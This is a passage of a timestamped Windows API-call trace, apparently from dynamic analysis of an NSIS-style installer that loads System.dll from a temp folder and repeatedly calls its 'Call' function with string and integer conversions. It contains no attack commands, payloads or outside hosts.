lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.024] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.024] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.024] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3310376", iMaxLength=1024 | out: lpString1="3310376") returned="3310376" [0158.024] lstrlenA (lpString="3310376") returned 7 [0158.024] lstrcpynA (in: lpString1=0x336d34, lpString2="*3310376(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3310376(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3310376(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.024] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.025] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.025] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.025] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.025] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.025] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310376" | out: lpString1="3310376") returned="3310376" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="4") returned 1 [0158.026] lstrcpyA (in: lpString1=0x431800, lpString2="4" | out: lpString1="4") returned="4" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="264") returned 3 [0158.026] lstrcpyA (in: lpString1=0x430800, lpString2="264" | out: lpString1="264") returned="264" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="336") returned 3 [0158.026] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3310376") returned 7 [0158.026] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.026] lstrlenA (lpString="1224") returned 4 [0158.026] lstrcpynA (in: lpString1=0x42e3a0, lpString2="264", iMaxLength=1024 | out: lpString1="264") returned="264" [0158.026] lstrlenA (lpString="264") returned 3 [0158.026] lstrcpynA (in: lpString1=0x42e3a0, lpString2="336", iMaxLength=1024 | out: lpString1="336") returned="336" [0158.026] lstrlenA (lpString="336") returned 3 [0158.027] lstrcpynA (in: lpString1=0x40ac18, lpString2="336", iMaxLength=1024 | out: lpString1="336") returned="336" [0158.027] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.027] lstrcmpiA (lpString1="336", lpString2="0") returned 1 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3310376", iMaxLength=1024 | out: lpString1="3310376") returned="3310376" [0158.027] lstrlenA (lpString="3310376") returned 7 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="336", iMaxLength=1024 | out: lpString1="336") returned="336" [0158.027] lstrlenA (lpString="336") returned 3 [0158.027] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3310712") returned 7 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.027] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.027] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.027] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3310712", iMaxLength=1024 | out: lpString1="3310712") returned="3310712" [0158.027] lstrlenA (lpString="3310712") returned 7 [0158.027] lstrcpynA (in: lpString1=0x336d34, lpString2="*3310712(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3310712(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3310712(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.027] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.028] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.028] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.028] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310712" | out: lpString1="3310712") returned="3310712" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="324") returned 3 [0158.029] lstrcpyA (in: lpString1=0x431800, lpString2="324" | out: lpString1="324") returned="324" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="332") returned 3 [0158.029] lstrcpyA (in: lpString1=0x430800, lpString2="332" | out: lpString1="332") returned="332" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="784") returned 3 [0158.029] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3310712") returned 7 [0158.029] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.029] lstrlenA (lpString="1224") returned 4 [0158.029] lstrcpynA (in: lpString1=0x42e3a0, lpString2="332", iMaxLength=1024 | out: lpString1="332") returned="332" [0158.029] lstrlenA (lpString="332") returned 3 [0158.029] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.029] lstrlenA (lpString="784") returned 3 [0158.029] lstrcpynA (in: lpString1=0x40ac18, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.029] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.029] lstrcmpiA (lpString1="784", lpString2="0") returned 1 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3310712", iMaxLength=1024 | out: lpString1="3310712") returned="3310712" [0158.030] lstrlenA (lpString="3310712") returned 7 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.030] lstrlenA (lpString="784") returned 3 [0158.030] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3311496") returned 7 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.030] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.030] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.030] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3311496", iMaxLength=1024 | out: lpString1="3311496") returned="3311496" [0158.030] lstrlenA (lpString="3311496") returned 7 [0158.030] lstrcpynA (in: lpString1=0x336d34, lpString2="*3311496(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3311496(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3311496(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.030] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.031] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.031] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.031] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311496" | out: lpString1="3311496") returned="3311496" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.032] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="324") returned 3 [0158.032] lstrcpyA (in: lpString1=0x431800, lpString2="324" | out: lpString1="324") returned="324" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.032] lstrcpyA (in: lpString1=0x430800, lpString2="380" | out: lpString1="380") returned="380" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="400") returned 3 [0158.032] lstrcpyA (in: lpString1=0x431000, lpString2="400" | out: lpString1="400") returned="400" [0158.032] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3311496") returned 7 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.032] lstrlenA (lpString="1224") returned 4 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="380", iMaxLength=1024 | out: lpString1="380") returned="380" [0158.032] lstrlenA (lpString="380") returned 3 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="400", iMaxLength=1024 | out: lpString1="400") returned="400" [0158.032] lstrlenA (lpString="400") returned 3 [0158.032] lstrcpynA (in: lpString1=0x40ac18, lpString2="400", iMaxLength=1024 | out: lpString1="400") returned="400" [0158.032] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.032] lstrcmpiA (lpString1="400", lpString2="0") returned 1 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3311496", iMaxLength=1024 | out: lpString1="3311496") returned="3311496" [0158.032] lstrlenA (lpString="3311496") returned 7 [0158.032] lstrcpynA (in: lpString1=0x42e3a0, lpString2="400", iMaxLength=1024 | out: lpString1="400") returned="400" [0158.032] lstrlenA (lpString="400") returned 3 [0158.032] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3311896") returned 7 [0158.033] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.033] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.033] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.033] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.033] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3311896", iMaxLength=1024 | out: lpString1="3311896") returned="3311896" [0158.033] lstrlenA (lpString="3311896") returned 7 [0158.033] lstrcpynA (in: lpString1=0x336d34, lpString2="*3311896(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3311896(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3311896(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.033] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.033] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.033] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.033] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.034] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.034] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311896" | out: lpString1="3311896") returned="3311896" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.034] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="372") returned 3 [0158.034] lstrcpyA (in: lpString1=0x431800, lpString2="372" | out: lpString1="372") returned="372" [0158.034] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="392") returned 3 [0158.035] lstrcpyA (in: lpString1=0x430800, lpString2="392" | out: lpString1="392") returned="392" [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: 